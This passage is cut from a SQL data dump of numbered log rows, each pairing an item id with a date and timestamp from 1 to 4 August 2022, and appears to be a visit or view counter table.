06:01:20'),(55657,486,1,'2022-08-01','2022-08-01 06:46:18'),(55658,1612,1,'2022-08-01','2022-08-01 08:36:46'),(55659,1602,1,'2022-08-01','2022-08-01 09:20:12'),(55660,1602,1,'2022-08-01','2022-08-01 09:20:14'),(55661,3069,1,'2022-08-01','2022-08-01 09:21:28'),(55662,4301,1,'2022-08-01','2022-08-01 09:22:45'),(55663,3226,1,'2022-08-01','2022-08-01 09:23:12'),(55664,468,1,'2022-08-01','2022-08-01 10:12:48'),(55665,72,1,'2022-08-01','2022-08-01 10:34:30'),(55666,4677,1,'2022-08-01','2022-08-01 10:51:19'),(55667,1608,1,'2022-08-01','2022-08-01 11:00:01'),(55668,3226,1,'2022-08-01','2022-08-01 11:00:22'),(55669,3226,1,'2022-08-01','2022-08-01 11:02:07'),(55670,3226,1,'2022-08-01','2022-08-01 11:04:51'),(55671,91,1,'2022-08-01','2022-08-01 11:05:27'),(55672,3226,1,'2022-08-01','2022-08-01 11:06:38'),(55673,3226,1,'2022-08-01','2022-08-01 11:06:55'),(55674,3226,1,'2022-08-01','2022-08-01 11:07:31'),(55675,3226,1,'2022-08-01','2022-08-01 11:09:50'),(55676,3226,1,'2022-08-01','2022-08-01 11:10:13'),(55677,1544,1,'2022-08-01','2022-08-01 14:23:13'),(55678,1608,1,'2022-08-01','2022-08-01 14:26:48'),(55679,4412,1,'2022-08-01','2022-08-01 14:53:01'),(55680,1594,1,'2022-08-01','2022-08-01 15:04:14'),(55681,2804,1,'2022-08-01','2022-08-01 15:24:21'),(55682,1598,1,'2022-08-01','2022-08-01 15:26:39'),(55683,4654,1,'2022-08-01','2022-08-01 15:54:20'),(55684,4428,1,'2022-08-01','2022-08-01 15:56:50'),(55685,91,1,'2022-08-01','2022-08-01 16:52:49'),(55686,89,1,'2022-08-01','2022-08-01 16:53:34'),(55687,89,1,'2022-08-01','2022-08-01 16:53:52'),(55688,1612,1,'2022-08-01','2022-08-01 16:54:14'),(55689,1602,1,'2022-08-01','2022-08-01 16:54:19'),(55690,80,1,'2022-08-01','2022-08-01 19:03:38'),(55691,3069,1,'2022-08-01','2022-08-01 19:56:23'),(55692,84,1,'2022-08-01','2022-08-01 20:41:21'),(55693,4703,1,'2022-08-01','2022-08-01 21:49:03'),(55694,3275,1,'2022-08-01','2022-08-01 22:33:53'),(55695,3781,1,'2022-08-01','2022-08-01 22:39:38'),(55696,1703,1,'2022-08-01','2022-08-01 22:41:10'),(55697,468,1,'2022-08-01','2022-08-01 23:52:52'),(55698,87,1,'2022-08-02','2022-08-02 00:06:15'),(55699,1588,1,'2022-08-02','2022-08-02 01:04:03'),(55700,3664,1,'2022-08-02','2022-08-02 01:16:11'),(55701,4498,1,'2022-08-02','2022-08-02 01:34:01'),(55702,4685,1,'2022-08-02','2022-08-02 04:04:02'),(55703,2911,1,'2022-08-02','2022-08-02 04:16:17'),(55704,3674,1,'2022-08-02','2022-08-02 06:04:26'),(55705,1602,1,'2022-08-02','2022-08-02 06:15:31'),(55706,4733,1,'2022-08-02','2022-08-02 07:04:24'),(55707,4412,1,'2022-08-02','2022-08-02 10:01:03'),(55708,1588,1,'2022-08-02','2022-08-02 10:03:56'),(55709,1614,1,'2022-08-02','2022-08-02 10:21:54'),(55710,91,1,'2022-08-02','2022-08-02 10:31:57'),(55711,3479,1,'2022-08-02','2022-08-02 10:48:54'),(55712,1596,1,'2022-08-02','2022-08-02 11:08:59'),(55713,2252,1,'2022-08-02','2022-08-02 12:07:10'),(55714,4703,1,'2022-08-02','2022-08-02 12:18:59'),(55715,1600,1,'2022-08-02','2022-08-02 12:30:40'),(55716,4238,1,'2022-08-02','2022-08-02 12:49:46'),(55717,3541,1,'2022-08-02','2022-08-02 13:03:52'),(55718,4660,1,'2022-08-02','2022-08-02 13:15:45'),(55719,1715,1,'2022-08-02','2022-08-02 13:37:11'),(55720,4792,1,'2022-08-02','2022-08-02 14:46:50'),(55721,3691,1,'2022-08-02','2022-08-02 15:18:55'),(55722,1728,1,'2022-08-02','2022-08-02 16:20:58'),(55723,1728,1,'2022-08-02','2022-08-02 16:21:23'),(55724,1728,1,'2022-08-02','2022-08-02 16:21:37'),(55725,1728,1,'2022-08-02','2022-08-02 16:24:04'),(55726,91,1,'2022-08-02','2022-08-02 16:24:20'),(55727,72,1,'2022-08-02','2022-08-02 20:21:50'),(55728,4827,1,'2022-08-02','2022-08-02 20:22:01'),(55729,4827,1,'2022-08-02','2022-08-02 20:23:18'),(55730,4827,1,'2022-08-02','2022-08-02 20:23:58'),(55731,72,1,'2022-08-02','2022-08-02 20:24:43'),(55732,4830,1,'2022-08-02','2022-08-02 20:24:54'),(55733,72,1,'2022-08-02','2022-08-02 20:25:15'),(55734,4832,1,'2022-08-02','2022-08-02 20:25:20'),(55735,72,1,'2022-08-02','2022-08-02 20:25:55'),(55736,4835,1,'2022-08-02','2022-08-02 20:26:02'),(55737,72,1,'2022-08-02','2022-08-02 20:26:37'),(55738,4837,1,'2022-08-02','2022-08-02 20:26:44'),(55739,72,1,'2022-08-02','2022-08-02 20:27:29'),(55740,4840,1,'2022-08-02','2022-08-02 20:27:36'),(55741,72,1,'2022-08-02','2022-08-02 20:28:06'),(55742,4842,1,'2022-08-02','2022-08-02 20:28:11'),(55743,72,1,'2022-08-02','2022-08-02 20:28:34'),(55744,4845,1,'2022-08-02','2022-08-02 20:28:39'),(55745,1741,1,'2022-08-02','2022-08-02 22:10:25'),(55746,1612,1,'2022-08-02','2022-08-02 22:10:28'),(55747,3030,1,'2022-08-02','2022-08-02 22:55:26'),(55748,4837,1,'2022-08-02','2022-08-02 23:17:33'),(55749,4842,1,'2022-08-02','2022-08-02 23:20:17'),(55750,2911,1,'2022-08-03','2022-08-03 00:14:06'),(55751,1600,1,'2022-08-03','2022-08-03 00:25:26'),(55752,91,1,'2022-08-03','2022-08-03 00:40:12'),(55753,89,1,'2022-08-03','2022-08-03 00:44:02'),(55754,1588,1,'2022-08-03','2022-08-03 00:44:45'),(55755,1596,1,'2022-08-03','2022-08-03 01:12:13'),(55756,4759,1,'2022-08-03','2022-08-03 01:44:05'),(55757,2309,1,'2022-08-03','2022-08-03 01:55:27'),(55758,4517,1,'2022-08-03','2022-08-03 02:50:16'),(55759,487,1,'2022-08-03','2022-08-03 03:25:27'),(55760,4454,1,'2022-08-03','2022-08-03 04:22:08'),(55761,1614,1,'2022-08-03','2022-08-03 05:37:24'),(55762,1594,1,'2022-08-03','2022-08-03 05:40:25'),(55763,1612,1,'2022-08-03','2022-08-03 06:42:07'),(55764,91,1,'2022-08-03','2022-08-03 06:43:19'),(55765,1612,1,'2022-08-03','2022-08-03 06:44:28'),(55766,3030,1,'2022-08-03','2022-08-03 07:10:38'),(55767,4404,1,'2022-08-03','2022-08-03 09:21:19'),(55768,91,1,'2022-08-03','2022-08-03 10:10:35'),(55769,2309,1,'2022-08-03','2022-08-03 10:10:55'),(55770,1745,1,'2022-08-03','2022-08-03 10:37:27'),(55771,1745,1,'2022-08-03','2022-08-03 11:22:26'),(55772,1588,1,'2022-08-03','2022-08-03 11:33:45'),(55773,4444,1,'2022-08-03','2022-08-03 11:40:29'),(55774,3664,1,'2022-08-03','2022-08-03 11:52:28'),(55775,3675,1,'2022-08-03','2022-08-03 11:58:27'),(55776,91,1,'2022-08-03','2022-08-03 11:59:38'),(55777,1602,1,'2022-08-03','2022-08-03 12:30:11'),(55778,3027,1,'2022-08-03','2022-08-03 12:55:29'),(55779,4612,1,'2022-08-03','2022-08-03 13:07:50'),(55780,1594,1,'2022-08-03','2022-08-03 13:40:27'),(55781,3102,1,'2022-08-03','2022-08-03 14:19:32'),(55782,1596,1,'2022-08-03','2022-08-03 14:54:36'),(55783,1728,1,'2022-08-03','2022-08-03 15:36:45'),(55784,1728,1,'2022-08-03','2022-08-03 15:37:35'),(55785,72,1,'2022-08-03','2022-08-03 15:46:30'),(55786,4845,1,'2022-08-03','2022-08-03 15:46:40'),(55787,4842,1,'2022-08-03','2022-08-03 15:47:07'),(55788,4840,1,'2022-08-03','2022-08-03 15:47:28'),(55789,4837,1,'2022-08-03','2022-08-03 15:47:56'),(55790,4835,1,'2022-08-03','2022-08-03 15:48:34'),(55791,4832,1,'2022-08-03','2022-08-03 15:48:54'),(55792,4830,1,'2022-08-03','2022-08-03 15:50:12'),(55793,4830,1,'2022-08-03','2022-08-03 15:50:34'),(55794,4827,1,'2022-08-03','2022-08-03 15:51:09'),(55795,4428,1,'2022-08-03','2022-08-03 15:52:25'),(55796,4827,1,'2022-08-03','2022-08-03 15:55:24'),(55797,4827,1,'2022-08-03','2022-08-03 15:57:00'),(55798,4827,1,'2022-08-03','2022-08-03 15:57:07'),(55799,4845,1,'2022-08-03','2022-08-03 15:58:47'),(55800,2904,1,'2022-08-03','2022-08-03 15:59:08'),(55801,2904,1,'2022-08-03','2022-08-03 15:59:35'),(55802,4827,1,'2022-08-03','2022-08-03 16:00:45'),(55803,4827,1,'2022-08-03','2022-08-03 16:02:02'),(55804,74,1,'2022-08-03','2022-08-03 16:02:22'),(55805,4827,1,'2022-08-03','2022-08-03 16:04:02'),(55806,4827,1,'2022-08-03','2022-08-03 16:04:06'),(55807,4827,1,'2022-08-03','2022-08-03 16:04:22'),(55808,4827,1,'2022-08-03','2022-08-03 16:04:34'),(55809,4827,1,'2022-08-03','2022-08-03 16:05:49'),(55810,4827,1,'2022-08-03','2022-08-03 16:07:58'),(55811,4827,1,'2022-08-03','2022-08-03 16:09:04'),(55812,4837,1,'2022-08-03','2022-08-03 16:09:45'),(55813,4827,1,'2022-08-03','2022-08-03 16:12:06'),(55814,4827,1,'2022-08-03','2022-08-03 16:15:07'),(55815,4827,1,'2022-08-03','2022-08-03 16:19:23'),(55816,4827,1,'2022-08-03','2022-08-03 16:19:33'),(55817,4827,1,'2022-08-03','2022-08-03 16:20:37'),(55818,4827,1,'2022-08-03','2022-08-03 16:24:59'),(55819,4827,1,'2022-08-03','2022-08-03 16:26:03'),(55820,68,1,'2022-08-03','2022-08-03 16:27:52'),(55821,4827,1,'2022-08-03','2022-08-03 16:28:28'),(55822,4827,1,'2022-08-03','2022-08-03 16:29:34'),(55823,2503,1,'2022-08-03','2022-08-03 16:33:21'),(55824,4827,1,'2022-08-03','2022-08-03 16:36:06'),(55825,74,1,'2022-08-03','2022-08-03 16:36:55'),(55826,4827,1,'2022-08-03','2022-08-03 16:37:12'),(55827,4827,1,'2022-08-03','2022-08-03 16:37:22'),(55828,4827,1,'2022-08-03','2022-08-03 16:38:06'),(55829,4827,1,'2022-08-03','2022-08-03 16:38:40'),(55830,4827,1,'2022-08-03','2022-08-03 16:38:50'),(55831,4827,1,'2022-08-03','2022-08-03 16:39:20'),(55832,72,1,'2022-08-03','2022-08-03 16:40:16'),(55833,4827,1,'2022-08-03','2022-08-03 16:40:17'),(55834,2063,1,'2022-08-03','2022-08-03 16:40:28'),(55835,72,1,'2022-08-03','2022-08-03 16:42:17'),(55836,4827,1,'2022-08-03','2022-08-03 16:44:12'),(55837,72,1,'2022-08-03','2022-08-03 16:45:47'),(55838,4827,1,'2022-08-03','2022-08-03 16:46:26'),(55839,4827,1,'2022-08-03','2022-08-03 16:46:27'),(55840,4827,1,'2022-08-03','2022-08-03 16:46:32'),(55841,4827,1,'2022-08-03','2022-08-03 16:47:26'),(55842,4827,1,'2022-08-03','2022-08-03 16:48:30'),(55843,4830,1,'2022-08-03','2022-08-03 16:48:39'),(55844,4827,1,'2022-08-03','2022-08-03 16:48:53'),(55845,4827,1,'2022-08-03','2022-08-03 16:49:07'),(55846,4830,1,'2022-08-03','2022-08-03 16:49:12'),(55847,4827,1,'2022-08-03','2022-08-03 16:49:13'),(55848,4612,1,'2022-08-03','2022-08-03 16:49:17'),(55849,4827,1,'2022-08-03','2022-08-03 16:50:34'),(55850,4835,1,'2022-08-03','2022-08-03 16:52:12'),(55851,4827,1,'2022-08-03','2022-08-03 16:52:35'),(55852,4835,1,'2022-08-03','2022-08-03 16:52:36'),(55853,4827,1,'2022-08-03','2022-08-03 16:52:54'),(55854,72,1,'2022-08-03','2022-08-03 16:52:55'),(55855,4827,1,'2022-08-03','2022-08-03 16:53:10'),(55856,4827,1,'2022-08-03','2022-08-03 16:53:36'),(55857,4842,1,'2022-08-03','2022-08-03 16:54:04'),(55858,4842,1,'2022-08-03','2022-08-03 16:54:14'),(55859,4845,1,'2022-08-03','2022-08-03 16:54:57'),(55860,4837,1,'2022-08-03','2022-08-03 16:56:08'),(55861,4827,1,'2022-08-03','2022-08-03 16:57:45'),(55862,4837,1,'2022-08-03','2022-08-03 16:58:09'),(55863,4827,1,'2022-08-03','2022-08-03 16:58:16'),(55864,4827,1,'2022-08-03','2022-08-03 16:59:09'),(55865,4837,1,'2022-08-03','2022-08-03 16:59:21'),(55866,4827,1,'2022-08-03','2022-08-03 17:00:27'),(55867,68,1,'2022-08-03','2022-08-03 17:02:10'),(55868,4837,1,'2022-08-03','2022-08-03 17:02:19'),(55869,4827,1,'2022-08-03','2022-08-03 17:02:29'),(55870,4612,1,'2022-08-03','2022-08-03 17:02:45'),(55871,4837,1,'2022-08-03','2022-08-03 17:02:46'),(55872,4840,1,'2022-08-03','2022-08-03 17:03:15'),(55873,4608,1,'2022-08-03','2022-08-03 17:03:16'),(55874,4837,1,'2022-08-03','2022-08-03 17:03:26'),(55875,4842,1,'2022-08-03','2022-08-03 17:03:53'),(55876,4827,1,'2022-08-03','2022-08-03 17:05:29'),(55877,4842,1,'2022-08-03','2022-08-03 17:05:46'),(55878,4556,1,'2022-08-03','2022-08-03 17:06:02'),(55879,4837,1,'2022-08-03','2022-08-03 17:06:18'),(55880,4837,1,'2022-08-03','2022-08-03 17:07:18'),(55881,1718,1,'2022-08-03','2022-08-03 17:07:20'),(55882,1718,1,'2022-08-03','2022-08-03 17:07:31'),(55883,1718,1,'2022-08-03','2022-08-03 17:07:44'),(55884,4845,1,'2022-08-03','2022-08-03 17:07:48'),(55885,1718,1,'2022-08-03','2022-08-03 17:08:00'),(55886,1718,1,'2022-08-03','2022-08-03 17:08:10'),(55887,1718,1,'2022-08-03','2022-08-03 17:08:52'),(55888,91,1,'2022-08-03','2022-08-03 17:09:42'),(55889,1749,1,'2022-08-03','2022-08-03 17:10:24'),(55890,1749,1,'2022-08-03','2022-08-03 17:10:42'),(55891,91,1,'2022-08-03','2022-08-03 17:11:00'),(55892,4797,1,'2022-08-03','2022-08-03 17:11:10'),(55893,4842,1,'2022-08-03','2022-08-03 17:11:20'),(55894,4830,1,'2022-08-03','2022-08-03 17:11:48'),(55895,4830,1,'2022-08-03','2022-08-03 17:12:41'),(55896,4802,1,'2022-08-03','2022-08-03 17:12:42'),(55897,4802,1,'2022-08-03','2022-08-03 17:12:44'),(55898,4830,1,'2022-08-03','2022-08-03 17:14:01'),(55899,91,1,'2022-08-03','2022-08-03 17:14:09'),(55900,1718,1,'2022-08-03','2022-08-03 17:14:41'),(55901,1718,1,'2022-08-03','2022-08-03 17:14:48'),(55902,1718,1,'2022-08-03','2022-08-03 17:15:02'),(55903,4842,1,'2022-08-03','2022-08-03 17:15:13'),(55904,89,1,'2022-08-03','2022-08-03 17:15:53'),(55905,91,1,'2022-08-03','2022-08-03 17:16:31'),(55906,4840,1,'2022-08-03','2022-08-03 17:17:12'),(55907,4840,1,'2022-08-03','2022-08-03 17:17:22'),(55908,4542,1,'2022-08-03','2022-08-03 17:17:26'),(55909,4827,1,'2022-08-03','2022-08-03 17:18:41'),(55910,4448,1,'2022-08-03','2022-08-03 17:18:45'),(55911,4444,1,'2022-08-03','2022-08-03 17:19:38'),(55912,4842,1,'2022-08-03','2022-08-03 17:21:04'),(55913,4440,1,'2022-08-03','2022-08-03 17:21:12'),(55914,4440,1,'2022-08-03','2022-08-03 17:21:14'),(55915,4842,1,'2022-08-03','2022-08-03 17:21:29'),(55916,91,1,'2022-08-03','2022-08-03 17:22:14'),(55917,1608,1,'2022-08-03','2022-08-03 17:22:25'),(55918,74,1,'2022-08-03','2022-08-03 17:22:46'),(55919,4412,1,'2022-08-03','2022-08-03 17:23:01'),(55920,2503,1,'2022-08-03','2022-08-03 17:23:04'),(55921,91,1,'2022-08-03','2022-08-03 17:24:43'),(55922,4842,1,'2022-08-03','2022-08-03 17:25:39'),(55923,74,1,'2022-08-03','2022-08-03 17:25:59'),(55924,4842,1,'2022-08-03','2022-08-03 17:26:33'),(55925,2503,1,'2022-08-03','2022-08-03 17:26:57'),(55926,4845,1,'2022-08-03','2022-08-03 17:28:30'),(55927,1718,1,'2022-08-03','2022-08-03 17:30:17'),(55928,4837,1,'2022-08-03','2022-08-03 17:33:45'),(55929,4845,1,'2022-08-03','2022-08-03 17:34:40'),(55930,4845,1,'2022-08-03','2022-08-03 17:37:01'),(55931,4845,1,'2022-08-03','2022-08-03 17:37:28'),(55932,4845,1,'2022-08-03','2022-08-03 17:51:52'),(55933,4845,1,'2022-08-03','2022-08-03 17:54:14'),(55934,4827,1,'2022-08-03','2022-08-03 17:59:47'),(55935,4827,1,'2022-08-03','2022-08-03 17:59:49'),(55936,4827,1,'2022-08-03','2022-08-03 18:00:38'),(55937,2904,1,'2022-08-03','2022-08-03 18:01:33'),(55938,4845,1,'2022-08-03','2022-08-03 18:01:51'),(55939,102,1,'2022-08-03','2022-08-03 18:02:21'),(55940,4827,1,'2022-08-03','2022-08-03 18:04:26'),(55941,4830,1,'2022-08-03','2022-08-03 18:04:55'),(55942,4827,1,'2022-08-03','2022-08-03 18:05:36'),(55943,4827,1,'2022-08-03','2022-08-03 18:06:10'),(55944,4845,1,'2022-08-03','2022-08-03 18:07:00'),(55945,4827,1,'2022-08-03','2022-08-03 18:07:31'),(55946,4517,1,'2022-08-03','2022-08-03 18:10:26'),(55947,4827,1,'2022-08-03','2022-08-03 18:12:05'),(55948,4827,1,'2022-08-03','2022-08-03 18:13:27'),(55949,4827,1,'2022-08-03','2022-08-03 18:16:45'),(55950,4835,1,'2022-08-03','2022-08-03 18:16:47'),(55951,4827,1,'2022-08-03','2022-08-03 18:17:07'),(55952,4827,1,'2022-08-03','2022-08-03 18:20:25'),(55953,4830,1,'2022-08-03','2022-08-03 18:21:33'),(55954,4827,1,'2022-08-03','2022-08-03 18:22:22'),(55955,4830,1,'2022-08-03','2022-08-03 18:22:49'),(55956,4827,1,'2022-08-03','2022-08-03 18:25:31'),(55957,4827,1,'2022-08-03','2022-08-03 18:27:17'),(55958,4827,1,'2022-08-03','2022-08-03 18:30:30'),(55959,4842,1,'2022-08-03','2022-08-03 18:32:29'),(55960,4827,1,'2022-08-03','2022-08-03 18:35:23'),(55961,4827,1,'2022-08-03','2022-08-03 18:35:23'),(55962,4827,1,'2022-08-03','2022-08-03 18:35:24'),(55963,74,1,'2022-08-03','2022-08-03 18:37:27'),(55964,2503,1,'2022-08-03','2022-08-03 18:37:52'),(55965,4827,1,'2022-08-03','2022-08-03 18:38:44'),(55966,4845,1,'2022-08-03','2022-08-03 18:41:02'),(55967,4845,1,'2022-08-03','2022-08-03 18:41:15'),(55968,4827,1,'2022-08-03','2022-08-03 18:43:04'),(55969,2503,1,'2022-08-03','2022-08-03 18:43:52'),(55970,4845,1,'2022-08-03','2022-08-03 18:45:28'),(55971,4827,1,'2022-08-03','2022-08-03 18:47:01'),(55972,4827,1,'2022-08-03','2022-08-03 18:47:26'),(55973,2904,1,'2022-08-03','2022-08-03 18:47:35'),(55974,102,1,'2022-08-03','2022-08-03 18:48:06'),(55975,2904,1,'2022-08-03','2022-08-03 18:49:11'),(55976,2904,1,'2022-08-03','2022-08-03 18:49:22'),(55977,4845,1,'2022-08-03','2022-08-03 18:53:24'),(55978,4840,1,'2022-08-03','2022-08-03 18:57:00'),(55979,2904,1,'2022-08-03','2022-08-03 18:57:56'),(55980,4830,1,'2022-08-03','2022-08-03 18:59:14'),(55981,2904,1,'2022-08-03','2022-08-03 18:59:30'),(55982,4827,1,'2022-08-03','2022-08-03 19:00:03'),(55983,4827,1,'2022-08-03','2022-08-03 19:02:42'),(55984,4842,1,'2022-08-03','2022-08-03 19:03:11'),(55985,4827,1,'2022-08-03','2022-08-03 19:04:05'),(55986,4837,1,'2022-08-03','2022-08-03 19:04:06'),(55987,4830,1,'2022-08-03','2022-08-03 19:04:28'),(55988,4845,1,'2022-08-03','2022-08-03 19:04:37'),(55989,4845,1,'2022-08-03','2022-08-03 19:07:25'),(55990,4827,1,'2022-08-03','2022-08-03 19:12:55'),(55991,4827,1,'2022-08-03','2022-08-03 19:15:43'),(55992,4827,1,'2022-08-03','2022-08-03 19:18:35'),(55993,4827,1,'2022-08-03','2022-08-03 19:21:42'),(55994,4827,1,'2022-08-03','2022-08-03 19:29:24'),(55995,4827,1,'2022-08-03','2022-08-03 19:29:40'),(55996,4845,1,'2022-08-03','2022-08-03 19:40:32'),(55997,4845,1,'2022-08-03','2022-08-03 19:41:39'),(55998,4827,1,'2022-08-03','2022-08-03 19:43:04'),(55999,4845,1,'2022-08-03','2022-08-03 19:43:44'),(56000,4827,1,'2022-08-03','2022-08-03 19:44:31'),(56001,4827,1,'2022-08-03','2022-08-03 19:54:56'),(56002,4845,1,'2022-08-03','2022-08-03 20:17:44'),(56003,4827,1,'2022-08-03','2022-08-03 20:19:17'),(56004,4827,1,'2022-08-03','2022-08-03 20:19:44'),(56005,1596,1,'2022-08-03','2022-08-03 20:22:28'),(56006,4842,1,'2022-08-03','2022-08-03 20:22:39'),(56007,1596,1,'2022-08-03','2022-08-03 20:23:47'),(56008,4845,1,'2022-08-03','2022-08-03 20:24:26'),(56009,4827,1,'2022-08-03','2022-08-03 20:43:56'),(56010,4827,1,'2022-08-03','2022-08-03 20:45:47'),(56011,4827,1,'2022-08-03','2022-08-03 20:46:16'),(56012,4827,1,'2022-08-03','2022-08-03 20:56:44'),(56013,4827,1,'2022-08-03','2022-08-03 20:58:18'),(56014,4827,1,'2022-08-03','2022-08-03 20:59:44'),(56015,2904,1,'2022-08-03','2022-08-03 21:00:37'),(56016,4827,1,'2022-08-03','2022-08-03 21:03:26'),(56017,4830,1,'2022-08-03','2022-08-03 21:04:18'),(56018,1596,1,'2022-08-03','2022-08-03 21:05:22'),(56019,4845,1,'2022-08-03','2022-08-03 21:05:26'),(56020,4827,1,'2022-08-03','2022-08-03 21:06:50'),(56021,4840,1,'2022-08-03','2022-08-03 21:08:11'),(56022,4827,1,'2022-08-03','2022-08-03 21:16:21'),(56023,4827,1,'2022-08-03','2022-08-03 21:21:03'),(56024,4837,1,'2022-08-03','2022-08-03 21:26:26'),(56025,4837,1,'2022-08-03','2022-08-03 21:29:58'),(56026,4827,1,'2022-08-03','2022-08-03 21:32:10'),(56027,4827,1,'2022-08-03','2022-08-03 21:35:11'),(56028,4827,1,'2022-08-03','2022-08-03 21:35:49'),(56029,4827,1,'2022-08-03','2022-08-03 21:36:01'),(56030,4827,1,'2022-08-03','2022-08-03 21:57:24'),(56031,4827,1,'2022-08-03','2022-08-03 22:04:53'),(56032,3664,1,'2022-08-03','2022-08-03 22:11:30'),(56033,1872,1,'2022-08-03','2022-08-03 22:33:44'),(56034,4827,1,'2022-08-03','2022-08-03 22:44:28'),(56035,4845,1,'2022-08-03','2022-08-03 22:46:11'),(56036,4845,1,'2022-08-03','2022-08-03 22:49:54'),(56037,2965,1,'2022-08-03','2022-08-03 23:17:14'),(56038,4845,1,'2022-08-03','2022-08-03 23:27:35'),(56039,4845,1,'2022-08-03','2022-08-03 23:35:31'),(56040,4830,1,'2022-08-04','2022-08-04 00:24:49'),(56041,4835,1,'2022-08-04','2022-08-04 00:26:08'),(56042,4323,1,'2022-08-04','2022-08-04 01:11:28'),(56043,4827,1,'2022-08-04','2022-08-04 01:28:29'),(56044,1703,1,'2022-08-04','2022-08-04 01:40:13'),(56045,1604,1,'2022-08-04','2022-08-04 02:41:29'),(56046,4827,1,'2022-08-04','2022-08-04 03:06:12'),(56047,4845,1,'2022-08-04','2022-08-04 03:40:22'),(56048,3083,1,'2022-08-04','2022-08-04 04:24:57'),(56049,3721,1,'2022-08-04','2022-08-04 04:26:55'),(56050,485,1,'2022-08-04','2022-08-04 05:09:57'),(56051,2248,1,'2022-08-04','2022-08-04 05:55:20'),(56052,4827,1,'2022-08-04','2022-08-04 06:24:02'),(56053,4845,1,'2022-08-04','2022-08-04 06:31:39'),(56054,4845,1,'2022-08-04','2022-08-04 06:54:32'),(56055,4827,1,'2022-08-04','2022-08-04 07:19:46'),(56056,4827,1,'2022-08-04','2022-08-04 07:21:40'),(56057,4827,1,'2022-08-04','2022-08-04 07:21:58'),(56058,4827,1,'2022-08-04','2022-08-04 07:22:18'),(56059,4827,1,'2022-08-04','2022-08-04 07:22:28'),(56060,4845,1,'2022-08-04','2022-08-04 07:24:13'),(56061,4827,1,'2022-08-04','2022-08-04 07:46:27'),(56062,1724,1,'2022-08-04','2022-08-04 07:56:27'),(56063,4827,1,'2022-08-04','2022-08-04 08:13:01'),(56064,4827,1,'2022-08-04','2022-08-04 08:13:40'),(56065,4832,1,'2022-08-04','2022-08-04 09:04:54'),(56066,4837,1,'2022-08-04','2022-08-04 09:23:12'),(56067,3691,1,'2022-08-04','2022-08-04 09:39:56'),(56068,4830,1,'2022-08-04','2022-08-04 09:58:12'),(56069,1703,1,'2022-08-04','2022-08-04 10:24:55'),(56070,4845,1,'2022-08-04','2022-08-04 10:25:12'),(56071,4827,1,'2022-08-04','2022-08-04 10:25:33'),(56072,4827,1,'2022-08-04','2022-08-04 10:25:57'),(56073,4827,1,'2022-08-04','2022-08-04 10:32:58'),(56074,3664,1,'2022-08-04','2022-08-04 10:36:43'),(56075,1608,1,'2022-08-04','2022-08-04 10:36:45'),(56076,4827,1,'2022-08-04','2022-08-04 10:53:24'),(56077,4326,1,'2022-08-04','2022-08-04 10:54:16'),(56078,4827,1,'2022-08-04','2022-08-04 11:01:54'),(56079,1582,1,'2022-08-04','2022-08-04 11:10:11'),(56080,72,1,'2022-08-04','2022-08-04 11:10:25'),(56081,4827,1,'2022-08-04','2022-08-04 11:18:48'),(56082,4827,1,'2022-08-04','2022-08-04 11:21:54'),(56083,68,1,'2022-08-04','2022-08-04 11:28:32'),(56084,68,1,'2022-08-04','2022-08-04 11:30:40'),(56085,1610,1,'2022-08-04','2022-08-04 11:53:59'),(56086,4827,1,'2022-08-04','2022-08-04 11:55:06'),(56087,1596,1,'2022-08-04','2022-08-04 12:43:27'),(56088,1596,1,'2022-08-04','2022-08-04 12:46:30'),(56089,4845,1,'2022-08-04','2022-08-04 13:33:07'),(56090,1614,1,'2022-08-04','2022-08-04 13:43:48'),(56091,4845,1,'2022-08-04','2022-08-04 13:46:29'),(56092,4845,1,'2022-08-04','2022-08-04 13:46:56'),(56093,4845,1,'2022-08-04','2022-08-04 13:46:59'),(56094,4845,1,'2022-08-04','2022-08-04 13:47:43'),(56095,2904,1,'2022-08-04','2022-08-04 13:49:27'),(56096,2904,1,'2022-08-04','2022-08-04 13:51:07'),(56097,2904,1,'2022-08-04','2022-08-04 13:51:30'),(56098,4845,1,'2022-08-04','2022-08-04 13:51:34'),(56099,2904,1,'2022-08-04','2022-08-04 13:52:01'),(56100,2904,1,'2022-08-04','2022-08-04 13:53:01'),(56101,4845,1,'2022-08-04','2022-08-04 13:55:38'),(56102,2904,1,'2022-08-04','2022-08-04 13:55:50'),(56103,2904,1,'2022-08-04','2022-08-04 14:04:15'),(56104,4835,1,'2022-08-04','2022-08-04 14:04:29'),(56105,2904,1,'2022-08-04','2022-08-04 14:04:40'),(56106,4845,1,'2022-08-04','2022-08-04 14:04:53'),(56107,4520,1,'2022-08-04','2022-08-04 14:21:17'),(56108,4420,1,'2022-08-04','2022-08-04 14:25:52'),(56109,1602,1,'2022-08-04','2022-08-04 14:38:33'),(56110,76,1,'2022-08-04','2022-08-04 14:40:10'),(56111,91,1,'2022-08-04','2022-08-04 14:40:36'),(56112,4845,1,'2022-08-04','2022-08-04 14:46:24'),(56113,4830,1,'2022-08-04','2022-08-04 15:27:51'),(56114,4830,1,'2022-08-04','2022-08-04 15:28:15'),(56115,4827,1,'2022-08-04','2022-08-04 15:29:09'),(56116,4845,1,'2022-08-04','2022-08-04 15:30:08'),(56117,4840,1,'2022-08-04','2022-08-04 15:31:08'),(56118,4420,1,'2022-08-04','2022-08-04 15:42:56'),(56119,2769,1,'2022-08-04','2022-08-04 15:43:13'),(56120,4845,1,'2022-08-04','2022-08-04 16:15:57'),(56121,1544,1,'2022-08-04','2022-08-04 16:21:45'),(56122,2503,1,'2022-08-04','2022-08-04 16:23:42'),(56123,3781,1,'2022-08-04','2022-08-04 16:38:10'),(56124,4845,1,'2022-08-04','2022-08-04 16:40:54'),(56125,4827,1,'2022-08-04','2022-08-04 16:51:11'),(56126,4827,1,'2022-08-04','2022-08-04 16:53:53'),(56127,4842,1,'2022-08-04','2022-08-04 16:54:03'),(56128,4827,1,'2022-08-04','2022-08-04 17:30:36'),(56129,74,1,'2022-08-04','2022-08-04 17:32:34'),(56130,4827,1,'2022-08-04','2022-08-04 17:38:53'),(56131,467,1,'2022-08-04','2022-08-04 17:53:21'),(56132,4520,1,'2022-08-04','2022-08-04 18:08:41'),(56133,4845,1,'2022-08-04','2022-08-04 18:34:08'),(56134,4845,1,'2022-08-04','2022-08-04 18:40:44'),(56135,3691,1,'2022-08-04','2022-08-04 18:58:37'),(56136,3781,1,'2022-08-04','2022-08-04 19:01:42'),(56137,4827,1,'2022-08-04','2022-08-04 19:17:37'),(56138,4827,1,'2022-08-04','2022-08-04 19:18:24'),(56139,4412,1,'2022-08-04','2022-08-04 19:39:47'),(56140,4412,1,'2022-08-04','2022-08-04 19:40:08'),(56141,4845,1,'2022-08-04','2022-08-04 